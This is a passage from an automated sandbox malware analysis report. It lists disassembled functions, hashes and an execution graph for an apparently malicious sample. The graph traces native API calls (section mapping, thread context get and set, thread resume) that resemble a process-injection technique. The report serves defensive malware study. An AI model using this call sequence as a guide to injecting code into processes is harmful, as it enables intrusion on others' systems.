                                                                                                                        • API String ID: 2633735394-0
                                                                                                                        • Opcode ID: 9f610d4256106c67e77eeb8086814c545808b76a3f9ccbb3b3612bd399037d2a
                                                                                                                        • Instruction ID: 021a644a5705dcc2f30118e794a8131803266c00eb7b550087217aa01a2668e3
                                                                                                                        • Opcode Fuzzy Hash: 9f610d4256106c67e77eeb8086814c545808b76a3f9ccbb3b3612bd399037d2a
                                                                                                                        • Instruction Fuzzy Hash: 17011B32000108BBCF125F55DD41EDB3BB5EF48754F04412AFA1865121D37AE8E1DF94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00418B86 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                        • Instruction ID: 3ad6a21e4fe395c3f16d5f8e27eb2f8b04298450baeff8efe86de5371b2d4043
                                                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                        • Instruction Fuzzy Hash: 51014C7600414EBBCF165E85CC51CEE3F62BB18354F58841AFE5858131D73BD9B2AB89
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406DE0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 320COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ctypestd::ios_base::width
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 2977974675-2766056989
                                                                                                                        • Opcode ID: 1dde864a4d1f71821fd79f88777ba04ceea7b7c97a2188b4ed7fa0e0ae202efd
                                                                                                                        • Instruction ID: ffa81e43551186a569dd1938059c660948f4a0953cb923ce35951bddbb60aeed
                                                                                                                        • Opcode Fuzzy Hash: 1dde864a4d1f71821fd79f88777ba04ceea7b7c97a2188b4ed7fa0e0ae202efd
                                                                                                                        • Instruction Fuzzy Hash: EBD13BB59001099FCB04DF98D991EEF7BB5AF88304F14816EF90AB7291D738AE51CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00408CE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: swprintf
                                                                                                                        • String ID: $$$
                                                                                                                        • API String ID: 233258989-233714265
                                                                                                                        • Opcode ID: 3668303aa29a0dabb202197abf4df9e866dd254b85a5112abaf3c729ecfcf1c2
                                                                                                                        • Instruction ID: bc444b2cf32fdad62ea948e60bd07a60d5c7d67e683fca1e49730543abc2646c
                                                                                                                        • Opcode Fuzzy Hash: 3668303aa29a0dabb202197abf4df9e866dd254b85a5112abaf3c729ecfcf1c2
                                                                                                                        • Instruction Fuzzy Hash: B3715B7190060DDECB05DFA8D9507AFB7B5FF58304F00826EE955B6280DB389992CF99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00408F30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: swprintf
                                                                                                                        • String ID: $$$
                                                                                                                        • API String ID: 233258989-233714265
                                                                                                                        • Opcode ID: f1704eac4cf36b8a75f20d87a995401e01ce9c4bc705e167662f00f3c097d210
                                                                                                                        • Instruction ID: 35cef4726bb78e6ff1766266f99b827679f0f48cacb583a1577e519e601fc831
                                                                                                                        • Opcode Fuzzy Hash: f1704eac4cf36b8a75f20d87a995401e01ce9c4bc705e167662f00f3c097d210
                                                                                                                        • Instruction Fuzzy Hash: 5C713871D0060DDECB05DFA8D860AAEB7B5FF49304F00816AE915B7291DB388A96CB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401690 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 004016C5
                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?), ref: 004016E5
                                                                                                                        Strings
                                                                                                                        • Failed to delete file: , xrefs: 00401716
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Affinity::operator!=Concurrency::details::DeleteFileHardware
                                                                                                                        • String ID: Failed to delete file:
                                                                                                                        • API String ID: 4164438129-802139604
                                                                                                                        • Opcode ID: d66dcf6a8dc6a3e5bd758008570e7375846c968408ebcd66a45ccf045e2991d6
                                                                                                                        • Instruction ID: 06c7ffe7d5daae15de523941c83ffb82ed17ce66fba7923ca96aaa4245e59707
                                                                                                                        • Opcode Fuzzy Hash: d66dcf6a8dc6a3e5bd758008570e7375846c968408ebcd66a45ccf045e2991d6
                                                                                                                        • Instruction Fuzzy Hash: F311FC71910108ABCB04FBA2DD91DEEB778AF54304B50457EB502B71A1EF386A45CB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004069C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Maklocchr$Getvals
                                                                                                                        • String ID: `@
                                                                                                                        • API String ID: 658415086-4145069739
                                                                                                                        • Opcode ID: c2d3c5db30b8487bfa4c4aeb23a8321ae3bc7ddcc7242e95170a85a8601fe89d
                                                                                                                        • Instruction ID: 6a1381a069a169ce79d2bee2e0d78584020825acce271e98bcd73c4ae330635a
                                                                                                                        • Opcode Fuzzy Hash: c2d3c5db30b8487bfa4c4aeb23a8321ae3bc7ddcc7242e95170a85a8601fe89d
                                                                                                                        • Instruction Fuzzy Hash: 20F0E275F40244A6D710DB91D801BACB371EF81710F24C12FE9013B3C0E6761611CB69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041A1D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0041A1EE
                                                                                                                          • Part of subcall function 00410793: __mtinitlocknum.LIBCMT ref: 004107A5
                                                                                                                          • Part of subcall function 00410793: EnterCriticalSection.KERNEL32(?,?,00415478,00000008,0040E28A,0042E380,0000000C,0040E37C,?,?,00401017,00425BD0), ref: 004107BE
                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0041A1FE
                                                                                                                          • Part of subcall function 00415B03: ___addlocaleref.LIBCMT ref: 00415B1F
                                                                                                                          • Part of subcall function 00415B03: ___removelocaleref.LIBCMT ref: 00415B2A
                                                                                                                          • Part of subcall function 00415B03: ___freetlocinfo.LIBCMT ref: 00415B3E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                        • String ID: H%C
                                                                                                                        • API String ID: 547918592-2263795111
                                                                                                                        • Opcode ID: a9dc2c54fcda5048e922219df0f4b85028d06726240b4d84cc39226bf667a4f2
                                                                                                                        • Instruction ID: a53420b0902ef64b63b1f707c45d0e93894e40e42d14a00336fc843c37c13c6a
                                                                                                                        • Opcode Fuzzy Hash: a9dc2c54fcda5048e922219df0f4b85028d06726240b4d84cc39226bf667a4f2
                                                                                                                        • Instruction Fuzzy Hash: 55E086715C2B20F9D664ABA16E177CDB2505B4073AFB0516FF018551D1CAFC16C0859E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040C346 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::exception::exception.LIBCMT ref: 0040C359
                                                                                                                          • Part of subcall function 0040F8BA: std::exception::_Copy_str.LIBCMT ref: 0040F8D3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040C36E
                                                                                                                          • Part of subcall function 0040FA12: RaiseException.KERNEL32(?,?,02FAF080,0042E150,?,?,?,?,?,0040E240,02FAF080,0042E150,?,00000001), ref: 0040FA67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                        • String ID: hB
                                                                                                                        • API String ID: 757275642-4076494561
                                                                                                                        • Opcode ID: 6c758fcc94796d7cdf548d3d4a82f0f196536c2b04cc85ce666a14877834395e
                                                                                                                        • Instruction ID: 0f3a68af293bead6babbb4631738e854e3801d5e08154dd3f376438cbc0ba5bd
                                                                                                                        • Opcode Fuzzy Hash: 6c758fcc94796d7cdf548d3d4a82f0f196536c2b04cc85ce666a14877834395e
                                                                                                                        • Instruction Fuzzy Hash: 26D01775D0020CBBCB00EFA5D4468CDBBB8AA04304B40C037AD14A7640EB38E20C8B88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040C374 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::exception::exception.LIBCMT ref: 0040C387
                                                                                                                          • Part of subcall function 0040F8BA: std::exception::_Copy_str.LIBCMT ref: 0040F8D3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040C39C
                                                                                                                          • Part of subcall function 0040FA12: RaiseException.KERNEL32(?,?,02FAF080,0042E150,?,?,?,?,?,0040E240,02FAF080,0042E150,?,00000001), ref: 0040FA67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                        • String ID: ,hB
                                                                                                                        • API String ID: 757275642-4225804165
                                                                                                                        • Opcode ID: 2f855e2fd30610a572568cada886d5fc2d72430644ccf6f9950a5ea43dce41f1
                                                                                                                        • Instruction ID: 9b3e3e6bf7c467838fe5340204e9767982166bef48709d352846509847c21599
                                                                                                                        • Opcode Fuzzy Hash: 2f855e2fd30610a572568cada886d5fc2d72430644ccf6f9950a5ea43dce41f1
                                                                                                                        • Instruction Fuzzy Hash: D2D0427590020CAACB04EEA5E4458DEBBA9AA04344B508476BD15A6641EA78E2488A98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:1.7%
                                                                                                                        Signature Coverage:10.7%
                                                                                                                        Total number of Nodes:410
                                                                                                                        Total number of Limit Nodes:40
                                                                                                                        execution_graph 89730 426a43 89731 426aa0 89730->89731 89732 426ad7 89731->89732 89735 423323 89731->89735 89734 426ab9 89736 4232b1 89735->89736 89737 42332f 89735->89737 89739 4232d4 89736->89739 89740 42a133 89736->89740 89739->89734 89743 4284e3 89740->89743 89742 42a164 89742->89739 89744 428504 89743->89744 89745 428549 89743->89745 89752 4293b3 89744->89752 89746 4293b3 LdrLoadDll 89745->89746 89748 42855f 89746->89748 89748->89742 89749 428521 89756 40b7b3 89749->89756 89751 428542 89751->89742 89753 4293c2 89752->89753 89755 429428 89752->89755 89753->89755 89760 423da3 89753->89760 89755->89749 89759 40b7d8 89756->89759 89757 40b8f5 NtAllocateVirtualMemory 89758 40b920 89757->89758 89758->89751 89759->89757 89761 423db1 89760->89761 89762 423dbd 89760->89762 89761->89762 89765 424223 LdrLoadDll 89761->89765 89762->89755 89764 423f0f 89764->89755 89765->89764 89766 42b743 89769 429db3 89766->89769 89770 429dd9 89769->89770 89781 4162d3 89770->89781 89772 429def 89773 429e40 89772->89773 89784 41a373 89772->89784 89775 429e0e 89776 429e23 89775->89776 89800 428703 89775->89800 89796 426183 89776->89796 89779 429e32 89780 428703 2 API calls 89779->89780 89780->89773 89783 4162e0 89781->89783 89804 416223 89781->89804 89783->89772 89785 41a39f 89784->89785 89842 417733 89785->89842 89787 41a3b1 89846 41a263 89787->89846 89790 41a3e4 89792 41a3f5 89790->89792 89795 4283b3 2 API calls 89790->89795 89791 41a3cc 89793 41a3d7 89791->89793 89856 4283b3 89791->89856 89792->89775 89793->89775 89795->89792 89797 4261dd 89796->89797 89799 4261ea 89797->89799 89878 417ee3 89797->89878 89799->89779 89801 42871d 89800->89801 89802 4293b3 LdrLoadDll 89801->89802 89803 42872e ExitProcess 89802->89803 89803->89776 89805 41623a 89804->89805 89821 425253 LdrLoadDll 89804->89821 89811 4252b3 89805->89811 89808 416246 89810 416253 89808->89810 89814 428d43 89808->89814 89810->89783 89822 428623 89811->89822 89816 428d5b 89814->89816 89815 428d7f 89815->89810 89816->89815 89826 427ae3 89816->89826 89821->89805 89823 42863d 89822->89823 89824 4293b3 LdrLoadDll 89823->89824 89825 4252d0 89824->89825 89825->89808 89827 427b00 89826->89827 89828 4293b3 LdrLoadDll 89827->89828 89829 427b11 89828->89829 89835 aa2c0a 89829->89835 89830 427b2c 89832 42a1c3 89830->89832 89838 4286b3 89832->89838 89834 428ded 89834->89810 89836 aa2c1f LdrInitializeThunk 89835->89836 89837 aa2c11 89835->89837 89836->89830 89837->89830 89839 4286cd 89838->89839 89840 4293b3 LdrLoadDll 89839->89840 89841 4286de RtlFreeHeap 89840->89841 89841->89834 89843 417779 89842->89843 89860 4175c3 LdrLoadDll 89843->89860 89845 41780c 89845->89787 89847 41a359 89846->89847 89848 41a27d 89846->89848 89847->89790 89847->89791 89861 417683 89848->89861 89850 41a2c2 89866 427b33 89850->89866 89852 41a307 89870 427b83 89852->89870 89855 4283b3 2 API calls 89855->89847 89857 4283cd 89856->89857 89858 4293b3 LdrLoadDll 89857->89858 89859 4283de NtClose 89858->89859 89859->89793 89860->89845 89862 4176a8 89861->89862 89865 4176b3 89862->89865 89876 4175c3 LdrLoadDll 89862->89876 89864 4176fb 89864->89850 89865->89850 89867 427b50 89866->89867 89868 4293b3 LdrLoadDll 89867->89868 89869 427b61 89868->89869 89869->89852 89871 427ba0 89870->89871 89872 4293b3 LdrLoadDll 89871->89872 89873 427bb1 89872->89873 89877 aa35c0 LdrInitializeThunk 89873->89877 89874 41a34d 89874->89855 89876->89864 89877->89874 89879 417f08 89878->89879 89903 41837b 89879->89903 89904 4232b3 89879->89904 89881 417fac 89881->89903 89907 413cf3 89881->89907 89883 41801a 89884 42a1c3 2 API calls 89883->89884 89883->89903 89887 418032 89884->89887 89885 418064 89891 41806b 89885->89891 89924 41a403 89885->89924 89887->89885 89920 406db3 89887->89920 89888 4180a4 89888->89903 89931 427c83 89888->89931 89891->89903 89940 427773 89891->89940 89893 418101 89949 4277f3 89893->89949 89895 41830a 89899 41832d 89895->89899 89966 4278f3 89895->89966 89896 418121 89896->89895 89958 406e23 89896->89958 89901 41834a 89899->89901 89962 41a5d3 89899->89962 89902 428703 2 API calls 89901->89902 89902->89903 89903->89799 89905 42a133 2 API calls 89904->89905 89906 4232d4 89905->89906 89906->89881 89909 413d59 89907->89909 89913 413d12 89907->89913 89908 413e67 89908->89883 89909->89908 89919 413e30 89909->89919 89975 413493 89909->89975 89912 413e44 89912->89908 89993 41a673 LdrLoadDll RtlFreeHeap LdrInitializeThunk 89912->89993 89913->89908 89913->89909 89914 41a5d3 2 API calls 89913->89914 89914->89913 89916 413d96 89916->89919 89988 413753 89916->89988 89917 413e5d 89917->89883 89919->89908 89992 41a673 LdrLoadDll RtlFreeHeap LdrInitializeThunk 89919->89992 89921 406de3 89920->89921 89922 41a5d3 2 API calls 89921->89922 89923 406e04 89921->89923 89922->89921 89923->89885 89925 41a420 89924->89925 90008 427bd3 89925->90008 89927 41a470 89928 41a477 89927->89928 89929 427c83 2 API calls 89927->89929 89928->89888 89930 41a4a0 89929->89930 89930->89888 89932 427ca4 89931->89932 89933 427cf9 89931->89933 89935 4293b3 LdrLoadDll 89932->89935 89934 4293b3 LdrLoadDll 89933->89934 89936 427d0f 89934->89936 89937 427cc1 89935->89937 89936->89891 90021 40aac3 89937->90021 89939 427cf2 89939->89891 89941 427794 89940->89941 89942 4277c9 89940->89942 89944 4293b3 LdrLoadDll 89941->89944 89943 4293b3 LdrLoadDll 89942->89943 89945 4277df 89943->89945 89946 4277b1 89944->89946 89945->89893 90025 40a063 89946->90025 89948 4277c2 89948->89893 89950 427811 89949->89950 89951 427846 89949->89951 89953 4293b3 LdrLoadDll 89950->89953 89952 4293b3 LdrLoadDll 89951->89952 89954 42785c 89952->89954 89955 42782e 89953->89955 89954->89896 90029 40a273 89955->90029 89957 42783f 89957->89896 89961 406e43 89958->89961 89959 41a5d3 2 API calls 89959->89961 89960 406e63 89960->89895 89961->89959 89961->89960 89963 41a5e6 89962->89963 90033 427a13 89963->90033 89965 41a611 89965->89899 89967 427949 89966->89967 89968 427914 89966->89968 89970 4293b3 LdrLoadDll 89967->89970 89969 4293b3 LdrLoadDll 89968->89969 89971 427931 89969->89971 89972 42795f 89970->89972 90046 40a483 89971->90046 89972->89899 89974 427942 89974->89899 89976 4134a3 89975->89976 89977 41349e 89975->89977 89978 42a133 2 API calls 89976->89978 89977->89916 89979 4134c8 89978->89979 89980 41352f 89979->89980 89982 413535 89979->89982 89986 42a133 2 API calls 89979->89986 89994 427a93 89979->89994 90000 4285d3 89979->90000 89980->89916 89983 41355f 89982->89983 89985 4285d3 2 API calls 89982->89985 89983->89916 89987 413550 89985->89987 89986->89979 89987->89916 89989 41376f 89988->89989 89990 4285d3 2 API calls 89989->89990 89991 413775 89990->89991 89991->89919 89992->89912 89993->89917 89995 427aad 89994->89995 89996 4293b3 LdrLoadDll 89995->89996 89997 427abe 89996->89997 90006 aa2df0 LdrInitializeThunk 89997->90006 89998 427ad5 89998->89979 90001 4285f0 90000->90001 90002 4293b3 LdrLoadDll 90001->90002 90003 428601 90002->90003 90007 aa2c70 LdrInitializeThunk 90003->90007 90004 428618 90004->89979 90006->89998 90007->90004 90009 427bf1 90008->90009 90010 427c3a 90008->90010 90011 4293b3 LdrLoadDll 90009->90011 90012 4293b3 LdrLoadDll 90010->90012 90013 427c0e 90011->90013 90014 427c50 90012->90014 90017 40a8a3 90013->90017 90014->89927 90016 427c33 90016->89927 90020 40a8c8 90017->90020 90018 40a9e5 NtCreateSection 90019 40aa14 90018->90019 90019->90016 90020->90018 90024 40aae8 90021->90024 90022 40ac05 NtMapViewOfSection 90023 40ac40 90022->90023 90023->89939 90024->90022 90028 40a088 90025->90028 90026 40a1a5 NtGetContextThread 90027 40a1c0 90026->90027 90027->89948 90028->90026 90032 40a298 90029->90032 90030 40a3b5 NtSetContextThread 90031 40a3d0 90030->90031 90031->89957 90032->90030 90034 427a69 90033->90034 90035 427a34 90033->90035 90036 4293b3 LdrLoadDll 90034->90036 90037 4293b3 LdrLoadDll 90035->90037 90038 427a7f 90036->90038 90039 427a51 90037->90039 90038->89965 90042 40b393 90039->90042 90041 427a62 90041->89965 90044 40b3b8 90042->90044 90043 40b4d5 NtDelayExecution 90045 40b4f1 90043->90045 90044->90043 90045->90041 90049 40a4a8 90046->90049 90047 40a5c5 NtResumeThread 90048 40a5e0 90047->90048 90048->89974 90049->90047 90050 428143 90051 428161 90050->90051 90052 4281ba 90050->90052 90053 4293b3 LdrLoadDll 90051->90053 90054 4293b3 LdrLoadDll 90052->90054 90055 42817e 90053->90055 90058 4281d0 90054->90058 90059 40acf3 90055->90059 90057 4281b3 90062 40ad18 90059->90062 90060 40ae35 NtCreateFile 90061 40ae74 90060->90061 90061->90057 90062->90060 90063 423903 90064 42391f 90063->90064 90075 4280a3 90064->90075 90067 423947 90069 4283b3 2 API calls 90067->90069 90068 42395b 90070 4283b3 2 API calls 90068->90070 90071 423950 90069->90071 90072 423964 90070->90072 90079 42a2e3 LdrLoadDll RtlAllocateHeap 90072->90079 90074 42396f 90076 4280c0 90075->90076 90077 4293b3 LdrLoadDll 90076->90077 90078 423940 90077->90078 90078->90067 90078->90068 90079->90074 90080 42b2a3 90081 42b2b3 90080->90081 90082 42b2b9 90080->90082 90085 42a2a3 90082->90085 90084 42b2df 90088 428663 90085->90088 90087 42a2be 90087->90084 90089 428680 90088->90089 90090 4293b3 LdrLoadDll 90089->90090 90091 428691 RtlAllocateHeap 90090->90091 90091->90087 90173 428273 90174 428294 90173->90174 90175 4282e5 90173->90175 90177 4293b3 LdrLoadDll 90174->90177 90176 4293b3 LdrLoadDll 90175->90176 90178 4282fb 90176->90178 90179 4282b1 90177->90179 90182 40af23 90179->90182 90181 4282de 90185 40af48 90182->90185 90183 40b065 NtReadFile 90184 40b09c 90183->90184 90184->90181 90185->90183 90186 423c93 90190 423ca2 90186->90190 90187 423ce9 90188 42a1c3 2 API calls 90187->90188 90189 423cf9 90188->90189 90190->90187 90191 423d2a 90190->90191 90193 423d2f 90190->90193 90192 42a1c3 2 API calls 90191->90192 90192->90193 90092 413bc3 90093 413bdd 90092->90093 90100 4173a3 90093->90100 90095 413bfb 90096 423da3 LdrLoadDll 90095->90096 90097 413c11 90096->90097 90098 413c40 90097->90098 90099 413c2f PostThreadMessageW 90097->90099 90099->90098 90101 4173c7 90100->90101 90102 417403 LdrLoadDll 90101->90102 90103 4173ce 90101->90103 90102->90103 90103->90095 90104 419c83 90105 419cf5 90104->90105 90106 419c9b 90104->90106 90106->90105 90110 41d323 LdrLoadDll 90106->90110 90108 419cdf 90108->90105 90111 41d5b3 90108->90111 90110->90108 90112 41d5d9 90111->90112 90113 423da3 LdrLoadDll 90112->90113 90115 41d62d 90113->90115 90114 41d99d 90114->90105 90115->90114 90158 428743 LdrLoadDll 90115->90158 90117 41d67e 90118 41d985 90117->90118 90159 42b3d3 90117->90159 90119 42a1c3 2 API calls 90118->90119 90119->90114 90121 41d69a 90121->90118 90122 427ae3 2 API calls 90121->90122 90123 41d7a0 90121->90123 90124 41d721 90122->90124 90165 4186c3 LdrLoadDll LdrInitializeThunk 90123->90165 90124->90123 90128 41d729 90124->90128 90126 41d7cb 90126->90118 90130 41d7fd 90126->90130 90168 4185c3 NtMapViewOfSection LdrLoadDll 90126->90168 90127 41d786 90131 42a1c3 2 API calls 90127->90131 90128->90114 90128->90127 90129 41d755 90128->90129 90166 4185c3 NtMapViewOfSection LdrLoadDll 90128->90166 90135 4283b3 2 API calls 90129->90135 90138 41d964 90130->90138 90139 41d82d 90130->90139 90132 41d796 90131->90132 90132->90105 90136 41d765 90135->90136 90167 4258d3 NtDelayExecution LdrLoadDll 90136->90167 90141 42a1c3 2 API calls 90138->90141 90169 428443 LdrLoadDll 90139->90169 90142 41d97b 90141->90142 90142->90105 90143 41d84c 90144 41a403 3 API calls 90143->90144 90145 41d8b5 90144->90145 90145->90118 90146 41d8c0 90145->90146 90147 42a1c3 2 API calls 90146->90147 90148 41d8e4 90147->90148 90170 427d43 LdrLoadDll 90148->90170 90150 41d8f8 90151 427c83 2 API calls 90150->90151 90152 41d91f 90151->90152 90153 41d926 90152->90153 90171 427d43 LdrLoadDll 90152->90171 90153->90105 90155 41d94c 90156 4278f3 2 API calls 90155->90156 90157 41d95a 90156->90157 